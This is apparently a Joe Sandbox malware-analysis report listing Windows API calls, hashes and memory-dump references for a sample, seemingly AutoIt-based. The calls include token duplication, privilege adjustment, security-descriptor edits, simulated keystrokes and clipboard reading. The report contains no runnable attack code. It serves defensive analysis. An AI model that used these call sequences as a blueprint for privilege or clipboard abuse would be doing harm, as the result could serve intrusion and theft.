                                                                                                                  • API ID: __wsopen_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3347428461-0
                                                                                                                  • Opcode ID: d7230ca5f19274cafb776ab7ea4c064896d1ef683f44f470f876111a85612cbb
                                                                                                                  • Instruction ID: 45f727ca1b8899753300c4b449fe1fe0952e8f5d8f3489e505f756ba3806688c
                                                                                                                  • Opcode Fuzzy Hash: d7230ca5f19274cafb776ab7ea4c064896d1ef683f44f470f876111a85612cbb
                                                                                                                  • Instruction Fuzzy Hash: F611187590410AAFCB05DF59E94199A7BF5EF48314F104059F808AB352DA31DA11CBA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AE4C7D: RtlAllocateHeap.NTDLL(00000008,00AB1129,00000000,?,00AE2E29,00000001,00000364,?,?,?,00ADF2DE,00AE3863,00B81444,?,00ACFDF5,?), ref: 00AE4CBE
                                                                                                                  • _free.LIBCMT ref: 00AE506C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 614378929-0
                                                                                                                  • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                  • Instruction ID: 3d34528a7ee4316922fa1342fc6df5b7107c4987012451840ade6d42733b9886
                                                                                                                  • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                  • Instruction Fuzzy Hash: 9C0149726047446FE3318F6AE885A5AFBECFB89370F25052DF184832C0EA70A905C7B4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
APIs
• RtlAllocateHeap.NTDLL(00000008,00AB1129,00000000,?,00AE2E29,00000001,00000364,?,?,?,00ADF2DE,00AE3863,00B81444,?,00ACFDF5,?), ref: 00AE4CBE
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• FreeLibrary.KERNEL32(?,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4F6D
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB2DC4
  • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
APIs
  • Part of subcall function 00AB3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB3908
  • Part of subcall function 00ABD730: GetInputState.USER32 ref: 00ABD807
• SetCurrentDirectoryW.KERNEL32(?), ref: 00AB2B6B
  • Part of subcall function 00AB30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AB314E
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Similarity
• API ID: IconNotifyShell_$CurrentDirectoryInputState
• String ID:
• API String ID: 3667716007-0
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 0180C393
Memory Dump Source
• Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 0180C363
Memory Dump Source
• Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,00AF0704,?,?,00000000,?,00AF0704,00000000,0000000C), ref: 00AF03B7
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00AB1CBC
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoParametersSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3098949447-0
                                                                                                                  • Opcode ID: ccd7ea085d49c45eb282b6168e1b6ba6fefb7832d144ec45cf6faae3df9ed0e4
                                                                                                                  • Instruction ID: cb58587ed4572f3ef1492786307c7c87c1b03780e64fdccf1dae23915a1a345f
                                                                                                                  • Opcode Fuzzy Hash: ccd7ea085d49c45eb282b6168e1b6ba6fefb7832d144ec45cf6faae3df9ed0e4
                                                                                                                  • Instruction Fuzzy Hash: D1C04C35281204AAE2144784BC4BF547754A358B00F044401F609565F38AA15410D754
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0180DD69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction ID: 92b811a4d98eacf2de27c2db18fc5a9892c5200bdf575d14c221188aa96dab39
                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction Fuzzy Hash: BBE0BF7494010EEFDB01DFE4D9496DD7BB4EF04301F1046A1FD05D7680DB309E549A62
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0180DD69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction ID: ea500c00999295fd3b0f08f75dda9975fc2a6f5f0332152f35aae67e93d6ed5f
                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction Fuzzy Hash: FBE0E67494010EDFDB00DFF4D94969D7BB4EF04301F104261FD01D2280D6309E509A62
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B4961A
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B4965B
                                                                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B4969F
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B496C9
                                                                                                                  • SendMessageW.USER32 ref: 00B496F2
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00B4978B
                                                                                                                  • GetKeyState.USER32(00000009), ref: 00B49798
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B497AE
                                                                                                                  • GetKeyState.USER32(00000010), ref: 00B497B8
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B497E9
                                                                                                                  • SendMessageW.USER32 ref: 00B49810
                                                                                                                  • SendMessageW.USER32(?,00001030,?,00B47E95), ref: 00B49918
                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B4992E
                                                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B49941
                                                                                                                  • SetCapture.USER32(?), ref: 00B4994A
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B499AF
                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B499BC
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B499D6
                                                                                                                  • ReleaseCapture.USER32 ref: 00B499E1
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B49A19
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B49A26
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B49A80
                                                                                                                  • SendMessageW.USER32 ref: 00B49AAE
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B49AEB
                                                                                                                  • SendMessageW.USER32 ref: 00B49B1A
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B49B3B
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B49B4A
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B49B68
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B49B75
                                                                                                                  • GetParent.USER32(?), ref: 00B49B93
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B49BFA
                                                                                                                  • SendMessageW.USER32 ref: 00B49C2B
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B49C84
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B49CB4
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B49CDE
                                                                                                                  • SendMessageW.USER32 ref: 00B49D01
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B49D4E
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B49D82
                                                                                                                    • Part of subcall function 00AC9944: GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B49E05
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                  • API String ID: 3429851547-4164748364
                                                                                                                  • Opcode ID: 8eaa10da414a7e9ad34156b2c5feccbbb6a02362152780b2b410c41502f04ebf
                                                                                                                  • Instruction ID: 2716c9e9ec9edbc233cd5fc3cab7115feadc5f85cf02154eccbb3e96993d4e67
                                                                                                                  • Opcode Fuzzy Hash: 8eaa10da414a7e9ad34156b2c5feccbbb6a02362152780b2b410c41502f04ebf
                                                                                                                  • Instruction Fuzzy Hash: 2E429F34205201AFD720CF28CC85EABBBE9FF49710F114A99F599872A1DB31EA51EF51
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B448F3
                                                                                                                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00B44908
                                                                                                                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00B44927
                                                                                                                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00B4494B
                                                                                                                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00B4495C
                                                                                                                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00B4497B
                                                                                                                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00B449AE
                                                                                                                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00B449D4
                                                                                                                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00B44A0F
                                                                                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B44A56
                                                                                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B44A7E
                                                                                                                  • IsMenu.USER32(?), ref: 00B44A97
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B44AF2
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B44B20
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B44B94
                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00B44BE3
                                                                                                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00B44C82
                                                                                                                  • wsprintfW.USER32 ref: 00B44CAE
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B44CC9
                                                                                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B44CF1
                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B44D13
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B44D33
                                                                                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B44D5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                  • API String ID: 4054740463-328681919
                                                                                                                  • Opcode ID: d504520ae695d17a6705edd4c7ffe8259451fc61d9939c84e2a4b015592057dd
                                                                                                                  • Instruction ID: 36c4f169d1fd923dac272b87d63bfa0972d7107dadc3c70f190c4241ac578604
                                                                                                                  • Opcode Fuzzy Hash: d504520ae695d17a6705edd4c7ffe8259451fc61d9939c84e2a4b015592057dd
                                                                                                                  • Instruction Fuzzy Hash: 4A12E171600214ABEB248F28CC49FAE7BF8FF45710F1041A9F91ADB2E1DB749A51DB50
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00ACF998
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B0F474
                                                                                                                  • IsIconic.USER32(00000000), ref: 00B0F47D
                                                                                                                  • ShowWindow.USER32(00000000,00000009), ref: 00B0F48A
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00B0F494
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0F4AA
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B0F4B1
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0F4BD
                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B0F4CE
                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B0F4D6
                                                                                                                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B0F4DE
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00B0F4E1
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F4F6
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F501
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F50B
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F510
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F519
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F51E
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F528
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F52D
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00B0F530
                                                                                                                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B0F557
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                  • Opcode ID: 86f2f9c48427f96e700b8825aef658e0956f407d779115f3f96400aa5b63c458
                                                                                                                  • Instruction ID: 4381287393d176e1bbb00e9c29b1f9a5d590f93d83ad5fa5dc2c2f0818fe6d24
                                                                                                                  • Opcode Fuzzy Hash: 86f2f9c48427f96e700b8825aef658e0956f407d779115f3f96400aa5b63c458
                                                                                                                  • Instruction Fuzzy Hash: 32314D75B41218BBEB206BA55C4AFBF7EACFB45F50F110065FA00E71D1CBB06E00AA60
APIs
  • Part of subcall function 00B116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
  • Part of subcall function 00B116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
  • Part of subcall function 00B116C3: GetLastError.KERNEL32 ref: 00B1174A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B11286
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B112A8
• CloseHandle.KERNEL32(?), ref: 00B112B9
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B112D1
• GetProcessWindowStation.USER32 ref: 00B112EA
• SetProcessWindowStation.USER32(00000000), ref: 00B112F4
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B11310
  • Part of subcall function 00B110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B111FC), ref: 00B110D4
  • Part of subcall function 00B110BF: CloseHandle.KERNEL32(?,?,00B111FC), ref: 00B110E9
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0
• API String ID: 22674027-1027155976
APIs
  • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B11114
  • Part of subcall function 00B110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11120
  • Part of subcall function 00B110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B1112F
  • Part of subcall function 00B110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11136
  • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B1114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B10BCC
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B10C00
• GetLengthSid.ADVAPI32(?), ref: 00B10C17
• GetAce.ADVAPI32(?,00000000,?), ref: 00B10C51
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B10C6D
• GetLengthSid.ADVAPI32(?), ref: 00B10C84
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B10C8C
• HeapAlloc.KERNEL32(00000000), ref: 00B10C93
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B10CB4
• CopySid.ADVAPI32(00000000), ref: 00B10CBB
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B10CEA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B10D0C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B10D1E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10D45
• HeapFree.KERNEL32(00000000), ref: 00B10D4C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10D55
• HeapFree.KERNEL32(00000000), ref: 00B10D5C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10D65
• HeapFree.KERNEL32(00000000), ref: 00B10D6C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00B10D78
• HeapFree.KERNEL32(00000000), ref: 00B10D7F
  • Part of subcall function 00B11193: GetProcessHeap.KERNEL32(00000008,00B10BB1,?,00000000,?,00B10BB1,?), ref: 00B111A1
  • Part of subcall function 00B11193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B10BB1,?), ref: 00B111A8
  • Part of subcall function 00B11193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B10BB1,?), ref: 00B111B7
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
APIs
• OpenClipboard.USER32(00B4CC08), ref: 00B2EB29
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00B2EB37
• GetClipboardData.USER32(0000000D), ref: 00B2EB43
• CloseClipboard.USER32 ref: 00B2EB4F
• GlobalLock.KERNEL32(00000000), ref: 00B2EB87
• CloseClipboard.USER32 ref: 00B2EB91
• GlobalUnlock.KERNEL32(00000000), ref: 00B2EBBC
• IsClipboardFormatAvailable.USER32(00000001), ref: 00B2EBC9
• GetClipboardData.USER32(00000001), ref: 00B2EBD1
• GlobalLock.KERNEL32(00000000), ref: 00B2EBE2
• GlobalUnlock.KERNEL32(00000000), ref: 00B2EC22
• IsClipboardFormatAvailable.USER32(0000000F), ref: 00B2EC38
• GetClipboardData.USER32(0000000F), ref: 00B2EC44
• GlobalLock.KERNEL32(00000000), ref: 00B2EC55
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B2EC77
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B2EC94
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B2ECD2
• GlobalUnlock.KERNEL32(00000000), ref: 00B2ECF3
• CountClipboardFormats.USER32 ref: 00B2ED14
• CloseClipboard.USER32 ref: 00B2ED59
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
• API String ID: 420908878-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00B269BE
• FindClose.KERNEL32(00000000), ref: 00B26A12
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B26A4E
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B26A75
  • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00B26AB2
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00B26ADF
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00B29663
• GetFileAttributesW.KERNEL32(?), ref: 00B296A1
• SetFileAttributesW.KERNEL32(?,?), ref: 00B296BB
• FindNextFileW.KERNEL32(00000000,?), ref: 00B296D3
• FindClose.KERNEL32(00000000), ref: 00B296DE
• FindFirstFileW.KERNEL32(*.*,?), ref: 00B296FA
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B2974A
• SetCurrentDirectoryW.KERNEL32(00B76B7C), ref: 00B29768
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00B29772
• FindClose.KERNEL32(00000000), ref: 00B2977F
• FindClose.KERNEL32(00000000), ref: 00B2978F
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00B297BE
